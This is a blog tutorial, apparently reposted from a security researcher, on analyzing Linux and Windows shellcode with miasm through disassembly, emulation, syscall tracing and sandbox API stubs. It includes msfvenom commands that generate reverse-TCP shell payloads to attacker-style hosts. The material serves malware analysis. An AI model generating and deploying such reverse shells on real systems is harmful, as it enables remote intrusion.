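黑客信息网 (Hacker Info Net): How to Analyze Shellcode with Miasm
Shellcode is a fascinating kind of software because it has to run under unusual constraints. It is also very small, which makes it a great target for learning a new tool. To be honest, I had wanted to learn miasm for a long time. The idea took root when I saw its first demo at the SSTIC security conference several years ago, but only recently did I finally find the time. This post is a short summary of what I learned.
Let's start with Linux shellcode, since it is simpler than Windows shellcode. Here is a first sample generated with msfvenom: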
msfvenom -p linux/x86/exec CMD=/bin/ls -a x86 --platform linux -f raw > sc_linux1
Let's disassemble this shellcode with miasm:
from miasm.analysis.binary import Container
from miasm.analysis.machine import Machine
with open("sc_linux1", "rb") as f:
    buf=f.read()
container=Container.from_string(buf)
machine=Machine('x86_32')
mdis=machine.dis_engine(container.bin_stream)
mdis.follow_call=True # Follow calls
mdis.dontdis_retcall=True # Don't disassemble after calls
disasm=mdis.dis_multiblock(offset=0)
print(disasm)
We get the following code:
loc_key_0
PUSH 0xB
POP EAX
CDQ
PUSH EDX
PUSHW 0x632D
MOV EDI, ESP
PUSH 0x68732F
PUSH 0x6E69622F
MOV EBX, ESP
PUSH EDX
CALL loc_key_1
-> c_to:loc_key_1
loc_key_1
PUSH EDI
PUSH EBX
MOV ECX, ESP
INT 0x80
[SNIP]
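The PUSH immediates in this listing are little-endian stack strings, and reading them back in reverse push order shows the arguments being built. PUSH 0x68732F followed by PUSH 0x6E69622F leaves "/bin/sh" at ESP (moved into EBX). PUSHW 0x632D, pushed on top of the zero from EDX (CDQ cleared it), leaves "-c" (moved into EDI). Below is a minimal sketch that rebuilds those bytes. `stack_string` is a hypothetical helper, and it models only 4-byte and 2-byte pushes.

```python
import struct

def stack_string(pushes):
    """Rebuild the bytes at ESP after a sequence of PUSH instructions.

    pushes: list of (value, size) tuples in execution order; size is 4 for
    PUSH imm32/reg and 2 for PUSHW imm16. The last push ends up at the
    lowest address (ESP), so the bytes are emitted in reverse order.
    """
    fmt = {4: "<I", 2: "<H"}  # x86 stores values little-endian
    return b"".join(struct.pack(fmt[size], value) for value, size in reversed(pushes))

# PUSH 0x68732F ; PUSH 0x6E69622F ; MOV EBX, ESP
print(stack_string([(0x68732F, 4), (0x6E69622F, 4)]))  # b'/bin/sh\x00'
# PUSH EDX (EDX == 0) ; PUSHW 0x632D ; MOV EDI, ESP
print(stack_string([(0, 4), (0x632D, 2)]))             # b'-c\x00\x00\x00\x00'
```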
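INT 0x80 performs the system call. The syscall number is loaded into EAX by the very first instructions (PUSH 0xB / POP EAX), and 0xB is execve. We can easily recover the data that follows CALL loc_key_1 by taking the bytes between the end of that instruction (its address plus its size) and the address of loc_key_1: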
> inst=list(disasm.blocks)[0].lines[10] # Instruction 10 of block 0
> print(buf[inst.offset+inst.l:disasm.loc_db.offsets[1]])
b'/bin/ls\x00'
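The same extraction can be done on the raw bytes without miasm, because a forward CALL over inline data is typically encoded as E8 followed by a signed 32-bit displacement relative to the next instruction. The sketch below assumes that encoding. `call_skip_data` is a hypothetical helper, and the test buffer is synthetic rather than the real sc_linux1.

```python
import struct

def call_skip_data(buf, call_offset):
    """Return the bytes jumped over by a CALL rel32 (opcode E8) at call_offset."""
    if buf[call_offset] != 0xE8:
        raise ValueError("not a CALL rel32 instruction")
    rel = struct.unpack_from("<i", buf, call_offset + 1)[0]  # signed displacement
    next_addr = call_offset + 5                              # CALL rel32 is 5 bytes long
    target = next_addr + rel                                 # where the CALL lands
    return buf[next_addr:target]

# Synthetic example: NOP, CALL +8, the inline string, then the call target code
demo = b"\x90" + b"\xe8\x08\x00\x00\x00" + b"/bin/ls\x00" + b"\x57\x53"
print(call_skip_data(demo, 1))  # b'/bin/ls\x00'
```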
Next, let's generate a more complex shellcode:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.2.2.14 LPORT=1234 -f raw > sc_linux2
Because this code uses conditional jumps, it is easier to read as a graph, so we export the control-flow graph to a DOT file:
from miasm.analysis.binary import Container
from miasm.analysis.machine import Machine
with open("sc_linux2", "rb") as f:
    buf=f.read()
container=Container.from_string(buf)
machine=Machine('x86_32')
mdis=machine.dis_engine(container.bin_stream)
mdis.follow_call=True # Follow calls
mdis.dontdis_retcall=True # Don't disassemble after calls
disasm=mdis.dis_multiblock(offset=0)
open('bin_cfg.dot', 'w').write(disasm.dot())
This code is hard to understand statically, so let's see whether miasm can emulate it.
Emulating instructions is actually very simple:
from miasm.analysis.machine import Machine
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open('sc_linux2', 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
myjit.set_trace_log()
myjit.run(run_addr)
Miasm emulates every instruction until it reaches the first INT 0x80 call:
40000000 PUSH 0xA
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFFC EBP 00000000 EIP 40000002 zf 0 nf 0 of 0 cf 0
40000002 POP ESI
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 0000000A EDI 00000000 ESP 01240000 EBP 00000000 EIP 40000003 zf 0 nf 0 of 0 cf 0
[SNIP]
40000010 INT 0x80
EAX 00000066 EBX 00000001 ECX 0123FFF4 EDX 00000000 ESI 0000000A EDI 00000000 ESP 0123FFF4 EBP 00000000 EIP 40000012 zf 0 nf 0 of 0 cf 0
Traceback (most recent call last):
File "linux1.py", line 11, in <module>
myjit.run(run_addr)
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 423, in run
return self.continue_run()
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 405, in continue_run
return next(self.run_iterator)
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 373, in runiter_once
assert(self.get_exception()==0)
AssertionError
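To make the first lines of this trace concrete, here is a toy interpreter that reproduces them. This is not how miasm works internally. The sketch handles only PUSH imm8 (opcode 6A) and POP r32 (opcodes 58 to 5F). It assumes the first three bytes of sc_linux2 are 6A 0A 5E, the standard encodings of PUSH 0xA / POP ESI, which is consistent with the instruction addresses in the trace. `toy_emulate` is a hypothetical name.

```python
REG_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]  # x86 register encoding order

def toy_emulate(code, base, esp):
    """Interpret PUSH imm8 / POP r32 only; return final registers and a short trace."""
    regs = {name: 0 for name in REG_ORDER}
    regs["ESP"] = esp
    regs["EIP"] = base
    stack = {}  # address -> 32-bit value, enough for this toy
    log = []
    while regs["EIP"] - base < len(code):
        pc = regs["EIP"] - base
        op = code[pc]
        if op == 0x6A:                       # PUSH imm8, sign-extended to 32 bits
            imm = code[pc + 1]
            if imm & 0x80:
                imm |= 0xFFFFFF00
            regs["ESP"] = (regs["ESP"] - 4) & 0xFFFFFFFF
            stack[regs["ESP"]] = imm
            size, text = 2, "PUSH 0x%X" % imm
        elif 0x58 <= op <= 0x5F:             # POP r32, register index in the low 3 bits
            name = REG_ORDER[op - 0x58]
            value = stack.pop(regs["ESP"])
            regs["ESP"] = (regs["ESP"] + 4) & 0xFFFFFFFF
            regs[name] = value
            size, text = 1, "POP " + name
        else:
            raise NotImplementedError("opcode 0x%02X" % op)
        regs["EIP"] += size
        log.append("%08X %s ESP %08X" % (base + pc, text, regs["ESP"]))
    return regs, log

regs, log = toy_emulate(bytes([0x6A, 0x0A, 0x5E]), 0x40000000, 0x01240000)
for line in log:
    print(line)
# 40000000 PUSH 0xA ESP 0123FFFC
# 40000002 POP ESI ESP 01240000
```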
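By default, the miasm machine does not execute system calls, but we can add an exception handler for EXCEPT_INT_XX (EXCEPT_SYSCALL on Linux x86_64) and implement them ourselves. Let's start by printing the syscall numbers: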
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE, EXCEPT_INT_XX
from miasm.analysis.machine import Machine
def exception_int(jitter):
    print("Syscall: {}".format(jitter.cpu.EAX))
    return True
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open('sc_linux2', 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
myjit.add_exception_handler(EXCEPT_INT_XX, exception_int)
myjit.run(run_addr)
The syscalls printed are:
Syscall: 102
Syscall: 102
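Both numbers are 102, which on 32-bit Linux is socketcall. This is a single multiplexed entry point for the socket API, and EBX selects the operation. The first INT 0x80 in the trace above has EBX=1, which is SYS_SOCKET. A small lookup table makes the handler's output easier to read. The table below is a hand-picked subset of the i386 syscall and socketcall numbers, and `describe_syscall` is a hypothetical helper that could be called from `exception_int` as `describe_syscall(jitter.cpu.EAX, jitter.cpu.EBX)`.

```python
# Subset of the Linux i386 syscall table (not exhaustive)
I386_SYSCALLS = {
    1: "exit", 3: "read", 4: "write", 11: "execve",
    63: "dup2", 102: "socketcall", 125: "mprotect",
}
# Operation codes passed in EBX to socketcall
SOCKETCALL_OPS = {1: "SYS_SOCKET", 2: "SYS_BIND", 3: "SYS_CONNECT", 4: "SYS_LISTEN", 5: "SYS_ACCEPT"}

def describe_syscall(eax, ebx):
    """Turn the EAX/EBX values seen at INT 0x80 into a readable name."""
    name = I386_SYSCALLS.get(eax, "syscall_%d" % eax)
    if eax == 102:  # socketcall: EBX says which socket function is meant
        op = SOCKETCALL_OPS.get(ebx, "op_%d" % ebx)
        return "%s(%s)" % (name, op)
    return name

print(describe_syscall(0x66, 1))  # socketcall(SYS_SOCKET)
print(describe_syscall(0xB, 0))   # execve
```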
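At first, I reimplemented a few of the syscalls that shellcode commonly uses. Only later did I realize that miasm already ships implementations of many syscalls, along with a way to make the virtual machine execute them.
I submitted a PR adding a few extra syscalls, so we can now emulate the shellcode: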
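import logging
from miasm.analysis.machine import Machine
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE
from miasm.os_dep.linux import environment, syscall

myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open("sc_linux2", 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
# Show every emulated syscall
log=logging.getLogger('syscalls')
log.setLevel(logging.DEBUG)
env=environment.LinuxEnvironment_x86_32()
syscall.enable_syscall_handling(myjit, env, syscall.syscall_callbacks_x86_32)
myjit.run(run_addr)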
And we get the following syscall trace:
[DEBUG ]: socket(AF_INET, SOCK_STREAM, 0)
[DEBUG ]: -> 3
[DEBUG ]: connect(fd, [AF_INET, 1234, 10.2.2.14], 102)
[DEBUG ]: -> 0
[DEBUG ]: sys_mprotect(123f000, 1000, 7)
[DEBUG ]: -> 0
[DEBUG ]: sys_read(3, 123ffe4, 24)
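The sys_mprotect line is easier to read once the protection bits are decoded. Assuming the trace prints hexadecimal values and the usual Linux constants (PROT_READ=1, PROT_WRITE=2, PROT_EXEC=4), 7 means read, write and execute. The 0x1000-byte page at 0x123f000 holds the emulated stack (ESP is around 0x0123FFF4 in the earlier trace). That page becomes executable just before the read from socket fd 3 into 0x123ffe4. This is consistent with a staged payload receiving its next stage, although the trace alone does not prove it. `describe_prot` is a hypothetical helper:

```python
# Linux mmap/mprotect protection bits
PROT_FLAGS = [(1, "PROT_READ"), (2, "PROT_WRITE"), (4, "PROT_EXEC")]

def describe_prot(prot):
    """Decode an mprotect() prot argument into symbolic flag names."""
    names = [name for bit, name in PROT_FLAGS if prot & bit]
    return "|".join(names) if names else "PROT_NONE"

print(describe_prot(7))  # PROT_READ|PROT_WRITE|PROT_EXEC
```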
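So analyzing Linux shellcode with miasm is quite easy, and you can also use this script.
Windows shellcode cannot rely on system call instructions, because Windows syscall numbers change between versions. It therefore has to use functions from shared libraries, which means loading them with LoadLibrary and GetProcAddress. To do that, the shellcode first has to find the addresses of these two functions in kernel32.dll, which is already loaded in memory.
Let's generate a first Windows shellcode with metasploit:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f raw > sc_windows1
We can generate a call graph with the code shown earlier:
Here we see one of the tricks most shellcodes use to get their own address. The CALL instruction pushes the address of the next instruction onto the stack, and a POP then stores it in EBP. The final CALL EBP therefore calls the instruction located right after the first CALL. Because we only did static analysis here, miasm does not know which address EBP holds.
We can still disassemble the code located after the first CALL by hand: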
inst=list(disasm.blocks)[0].lines[1] # We get the second line of the first block
next_addr=inst.offset + inst.l # offset + size of the instruction
disasm=mdis.dis_multiblock(offset=next_addr)
open('bin_cfg.dot', 'w').write(disasm.dot())
Here we see that the shellcode first finds the address of kernel32 by walking the PEB, PEB_LDR_DATA and LDR_DATA_TABLE_ENTRY structures in memory. Let's emulate it:
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE
from miasm.analysis.machine import Machine
def code_sentinelle(jitter):
    jitter.run=False
    jitter.pc=0
    return True
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open("sc_windows1", 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
myjit.set_trace_log()
myjit.push_uint32_t(0x1337beef)
myjit.add_breakpoint(0x1337beef, code_sentinelle)
myjit.run(run_addr)
40000000 CLD
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFFC EBP 00000000 EIP 40000001 zf 0 nf 0 of 0 cf 0
40000001 CALL loc_40000088
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFF8 EBP 00000000 EIP 40000088 zf 0 nf 0 of 0 cf 0
40000088 POP EBP
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFFC EBP 40000006 EIP 40000089 zf 0 nf 0 of 0 cf 0
40000089 PUSH 0x3233
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFF8 EBP 40000006 EIP 4000008E zf 0 nf 0 of 0 cf 0
[SNIP]
4000000B MOV EDX, DWORD PTR FS:[EAX + 0x30]
WARNING: address 0x30 is not mapped in virtual memory:
Traceback (most recent call last):
[SNIP]
RuntimeError: Cannot find address
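The structure walk that this instruction starts can be modeled without miasm. The sketch below lays out a fake TEB, PEB and loader list in a Python dictionary. It follows the commonly documented 32-bit offsets: TEB+0x30 holds the PEB, PEB+0x0C holds Ldr, Ldr+0x14 is InMemoryOrderModuleList, and DllBase and BaseDllName sit at +0x18 and +0x2C inside each LDR_DATA_TABLE_ENTRY. `FakeMemory`, `find_module_base` and `build_demo_process` are hypothetical names. The module bases come from the sandbox log later in this post, and every other address is made up.

```python
import struct

class FakeMemory:
    """Hypothetical sparse 32-bit memory: address -> byte, little-endian reads."""

    def __init__(self):
        self.cells = {}

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.cells[addr + i] = b

    def read(self, addr, size):
        return bytes(self.cells[addr + i] for i in range(size))

    def u16(self, addr):
        return struct.unpack("<H", self.read(addr, 2))[0]

    def u32(self, addr):
        return struct.unpack("<I", self.read(addr, 4))[0]

def find_module_base(mem, teb, wanted):
    """Walk TEB -> PEB -> Ldr -> InMemoryOrderModuleList and return DllBase."""
    peb = mem.u32(teb + 0x30)        # TEB->ProcessEnvironmentBlock (what FS:[0x30] reads)
    ldr = mem.u32(peb + 0x0C)        # PEB->Ldr
    head = ldr + 0x14                # &PEB_LDR_DATA.InMemoryOrderModuleList
    link = mem.u32(head)             # Flink of the first module
    while link != head:              # the list is circular
        # link points at LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks (entry + 0x08)
        name_len = mem.u16(link + 0x24)   # BaseDllName.Length (entry + 0x2C)
        name_ptr = mem.u32(link + 0x28)   # BaseDllName.Buffer (entry + 0x30)
        name = mem.read(name_ptr, name_len).decode("utf-16-le")
        if name.lower() == wanted.lower():
            return mem.u32(link + 0x10)   # DllBase (entry + 0x18)
        link = mem.u32(link)              # follow Flink
    return None

def build_demo_process():
    """Lay out a fake TEB/PEB/loader list with three modules."""
    mem = FakeMemory()
    teb, peb, ldr = 0x7FFDF000, 0x7FFD4000, 0x00241E90
    mem.write(teb + 0x30, struct.pack("<I", peb))
    mem.write(peb + 0x0C, struct.pack("<I", ldr))
    modules = [("sc_windows1.exe", 0x00400000),
               ("ntdll.dll", 0x7C900000),
               ("kernel32.dll", 0x7C800000)]
    entries = [0x00242000 + i * 0x100 for i in range(len(modules))]
    head = ldr + 0x14
    chain = [head] + [e + 0x08 for e in entries] + [head]
    for cur, nxt in zip(chain, chain[1:]):
        mem.write(cur, struct.pack("<I", nxt))                        # Flink pointers
    for entry, (name, base) in zip(entries, modules):
        raw = name.encode("utf-16-le")
        buf = entry + 0x80
        mem.write(entry + 0x18, struct.pack("<I", base))              # DllBase
        mem.write(entry + 0x2C, struct.pack("<HHI", len(raw), len(raw) + 2, buf))  # BaseDllName
        mem.write(buf, raw)
    return mem, teb

mem, teb = build_demo_process()
print(hex(find_module_base(mem, teb, "kernel32.dll")))  # 0x7c800000
```

This is exactly the kind of memory the plain emulator lacks, which is why the FS-relative read fails above.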
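The emulation runs fine until it reaches MOV EDX, DWORD PTR FS:[EAX + 0x30]. On 32-bit Windows, the FS segment points to the TEB, and this instruction reads the PEB address stored at offset 0x30 of the TEB. EAX is 0 here, as the warning about address 0x30 shows. However, miasm is only emulating code at this point and has not loaded any system structures into memory. To provide them, we need to run the code in miasm's full Windows sandbox. The sandbox only runs PE files, so we first use a short lief script to turn the shellcode into a complete PE file: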
from lief import PE
with open("sc_windows1", "rb") as f:
    data=f.read()
binary32=PE.Binary("pe_from_scratch", PE.PE_TYPE.PE32)
section_text =PE.Section(".text")
section_text.content =[c for c in data] # Take a list(int)
section_text.virtual_address=0x1000
section_text=binary32.add_section(section_text, PE.SECTION_TYPES.TEXT)
binary32.optional_header.addressof_entrypoint=section_text.virtual_address
builder=PE.Builder(binary32)
builder.build_imports(True)
builder.build()
builder.write("sc_windows1.exe")
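Before handing the result to the sandbox, it can be worth checking that the entry point really points at the shellcode section. The following is a minimal sketch using only struct, assuming a PE32 image. It follows e_lfanew at offset 0x3C, checks the "PE\0\0" signature, skips the 20-byte file header, and reads AddressOfEntryPoint at offset 16 of the optional header. `pe_entry_point` is a hypothetical helper and not part of lief, and the test header below is synthetic.

```python
import struct

def pe_entry_point(image):
    """Return (optional-header magic, AddressOfEntryPoint) of a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]    # offset of the NT headers
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                                  # skip Signature + IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]          # 0x10B for PE32
    entry = struct.unpack_from("<I", image, opt + 16)[0]     # AddressOfEntryPoint (an RVA)
    return magic, entry

# Usage on the file built above:
# with open("sc_windows1.exe", "rb") as f:
#     print(pe_entry_point(f.read()))
```

On sc_windows1.exe, the second value should equal the virtual address of the .text section that the script assigned as the entry point.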
Now let's run this PE in the miasm sandbox, using the use-windows-structs option to load the Windows structures into memory (the full code can be downloaded here):
from miasm.analysis.sandbox import Sandbox_Win_x86_32
class Options():
    def __init__(self):
        self.use_windows_structs=True
        self.jitter="gcc"
        #self.singlestep=True
        self.usesegm=True
        self.load_hdr=True
        self.loadbasedll=True
    def __getattr__(self, name):
        return None
options=Options()
# Create sandbox
sb=Sandbox_Win_x86_32("sc_windows1.exe", options, globals())
sb.run()
assert(sb.jitter.run is False)
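The loadbasedll option loads into memory the structures of the DLLs found in a folder named win_dll, so that folder must contain the required Windows x86_32 DLLs. When we run the script, it crashes: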
[SNIP]
[INFO ]: kernel32_LoadLibrary(dllname=0x13ffe8) ret addr: 0x40109b
[WARNING ]: warning adding .dll to modulename
[WARNING ]: ws2_32.dll
Traceback (most recent call last):
File "windows4.py", line 18, in <module>
sb.run()
[SNIP]
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 479, in handle_lib
raise ValueError('unknown api', hex(jitter.pc), repr(fname))
ValueError: ('unknown api', '0x71ab6a55', "'ws2_32_WSAStartup'")
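Looking at jitload.py, we see that it actually calls the DLL functions implemented in win_api_x86_32.py. kernel32_LoadLibrary is implemented there, but WSAStartup is not, so we need to implement it ourselves.
Miasm uses a clever trick to make implementing new library functions easy. The sandbox accepts an argument holding additional functions, and our script passes globals(). This means we only need to define a function with the right name in our code, and it will be used directly as the system function. Let's try this with ws2_32_WSAStartup: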
def ws2_32_WSAStartup(jitter):
    print("WSAStartup(wVersionRequired, lpWSAData)")
    ret_ad, args=jitter.func_args_stdcall(["wVersionRequired", "lpWSAData"])
    jitter.func_ret_stdcall(ret_ad, 0)
Now we get the following output:
[INFO ]: kernel32_LoadLibrary(dllname=0x13ffe8) ret addr: 0x40109b
[WARNING ]: warning adding .dll to modulename
[WARNING ]: ws2_32.dll
WSAStartup(wVersionRequired, lpWSAData)
Traceback (most recent call last):
[SNIP]
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 479, in handle_lib
raise ValueError('unknown api', hex(jitter.pc), repr(fname))
ValueError: ('unknown api', '0x71ab8b6a', "'ws2_32_WSASocketA'")
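The name-based lookup behind both "unknown api" errors can be modeled in a few lines. The following is a toy model, not miasm's actual code. It only imitates the behavior visible in the error messages: the module name is lowercased without its ".dll" suffix, joined to the function name with an underscore, and looked up in the dictionary given to the sandbox. `resolve_stub` is a hypothetical name.

```python
def resolve_stub(dll_name, func_name, user_funcs):
    """Toy name-based stub lookup: '<module>_<function>' in user_funcs (e.g. globals())."""
    module = dll_name.lower()
    if module.endswith(".dll"):
        module = module[:-4]
    fname = "%s_%s" % (module, func_name)
    func = user_funcs.get(fname)
    if func is None:
        raise ValueError("unknown api", repr(fname))
    return func

def ws2_32_WSAStartup(jitter):
    return "stub called"

stub = resolve_stub("WS2_32.dll", "WSAStartup", {"ws2_32_WSAStartup": ws2_32_WSAStartup})
print(stub(None))  # stub called
```

This is why defining `ws2_32_WSAStartup` at module level is enough: once it is in `globals()`, the lookup finds it, and the next missing function (here `ws2_32_WSASocketA`) becomes the new error.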
We can continue this way and implement, one by one, the functions the shellcode calls:
import struct

def ws2_32_WSASocketA(jitter):
    """
    SOCKET WSAAPI WSASocketA(
      int                 af,
      int                 type,
      int                 protocol,
      LPWSAPROTOCOL_INFOA lpProtocolInfo,
      GROUP               g,
      DWORD               dwFlags
    );
    """
    ADDRESS_FAM={2: "AF_INET", 23: "AF_INET6"}
    TYPES={1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
    PROTOCOLS={0: "Whatever", 6: "TCP", 17: "UDP"}
    ret_ad, args=jitter.func_args_stdcall(["af", "type", "protocol", "lpProtocolInfo", "g", "dwFlags"])
    print("WSASocketA({}, {}, {}, ...)".format(
        ADDRESS_FAM[args.af],
        TYPES[args.type],
        PROTOCOLS[args.protocol]
    ))
    jitter.func_ret_stdcall(ret_ad, 14)  # return a fake socket handle

def ws2_32_connect(jitter):
    ret_ad, args=jitter.func_args_stdcall(["s", "name", "namelen"])
    sockaddr=jitter.vm.get_mem(args.name, args.namelen)
    family=struct.unpack("<H", sockaddr[0:2])[0]  # sin_family, little-endian on x86
    if family==2:  # AF_INET
        port=struct.unpack(">H", sockaddr[2:4])[0]  # sin_port, network byte order
        ip=".".join([str(i) for i in struct.unpack("BBBB", sockaddr[4:8])])
        print("socket_connect(fd, [{}, {}, {}], {})".format("AF_INET", port, ip, args.namelen))
    else:
        print("connect()")
    jitter.func_ret_stdcall(ret_ad, 0)

def kernel32_CreateProcessA(jitter):
    ret_ad, args=jitter.func_args_stdcall(["lpApplicationName", "lpCommandLine", "lpProcessAttributes", "lpThreadAttributes", "bInheritHandles", "dwCreationFlags", "lpEnvironment", "lpCurrentDirectory", "lpStartupInfo", "lpProcessInformation"])
    jitter.func_ret_stdcall(ret_ad, 0)  # no process is actually created

def kernel32_ExitProcess(jitter):
    ret_ad, args=jitter.func_args_stdcall(["uExitCode"])
    jitter.func_ret_stdcall(ret_ad, 0)
    jitter.run=False  # stop the emulation
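Because these hooks are plain Python, their parsing logic can be checked offline before running the sandbox. The sketch below pulls the sockaddr_in decoding out of the connect hook into a hypothetical helper, `parse_sockaddr_in`. It assumes the standard 16-byte IPv4 layout: sin_family in host (little-endian) order, then sin_port and sin_addr in network order. The test data is built by hand from the LHOST and LPORT used with msfvenom above.

```python
import socket
import struct

def parse_sockaddr_in(raw):
    """Decode an IPv4 sockaddr_in as laid out in x86 memory; None if not AF_INET."""
    family = struct.unpack_from("<H", raw, 0)[0]   # sin_family, host byte order
    if family != 2:                                 # AF_INET
        return None
    port = struct.unpack_from(">H", raw, 2)[0]      # sin_port, network byte order
    ip = socket.inet_ntoa(raw[4:8])                 # sin_addr, network byte order
    return ip, port

raw = struct.pack("<H", 2) + struct.pack(">H", 443) + socket.inet_aton("192.168.56.1") + bytes(8)
print(parse_sockaddr_in(raw))  # ('192.168.56.1', 443)
```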
Finally, we can emulate the shellcode completely:
[INFO ]: Add module 400000 'sc_windows1.exe'
[INFO ]: Add module 7c900000 'ntdll.dll'
[INFO ]: Add module 7c800000 'kernel32.dll'
[INFO ]: Add module 7e410000 'user32.dll'
[INFO ]: Add module 774e0000 'ole32.dll'
[INFO ]: Add module 7e1e0000 'urlmon.dll'
[INFO ]: Add module 71ab0000 'ws2_32.dll'
[INFO ]: Add module 77dd0000 'advapi32.dll'
[INFO ]: Add module 76bf0000 'psapi.dll'
[INFO ]: kernel32_LoadLibrary(dllname=0x13ffe8) ret addr: 0x40109b
[WARNING ]: warning adding .dll to modulename
[WARNING ]: ws2_32.dll
WSAStartup(wVersionRequired, lpWSAData)
[INFO ]: ws2_32_WSAStartup(wVersionRequired=0x190, lpWSAData=0x13fe58) ret addr: 0x4010ab
[INFO ]: ws2_32_WSASocketA(af=0x2, type=0x1, protocol=0x0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) ret addr: 0x4010ba
WSASocketA(AF_INET, SOCK_STREAM, Whatever, ...)
[INFO ]: ws2_32_connect(s=0xe, name=0x13fe4c, namelen=0x10) ret addr: 0x4010d4
socket_connect(fd, [AF_INET, 443, 192.168.56.1], 16)
[INFO ]: kernel32_CreateProcessA(lpApplicationName=0x0, lpCommandLine=0x13fe48, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0x1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x13fe04, lpProcessInformation=0x13fdf4) ret addr: 0x401117
[INFO ]: kernel32_WaitForSingleObject(handle=0x0, dwms=0xffffffff) ret addr: 0x401125
[INFO ]: kernel32_GetVersion() ret addr: 0x401131
[INFO ]: kernel32_ExitProcess(uExitCode=0x0) ret addr: 0x401144
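Learning miasm turned out to be a lot of fun. I find it very powerful, and I have not even explored its symbolic execution features yet. It is of course not the only tool available (Triton, for example, does similar things), but I find miasm well written and richer in features. Its only real drawback is the current lack of documentation. If you want to start with miasm, the examples and blog posts here are good starting points, and Willi Ballenthin recently wrote a few blog posts that I also found helpful. Once you have learned a thing or two, consider contributing to the miasm documentation yourself!
Original article: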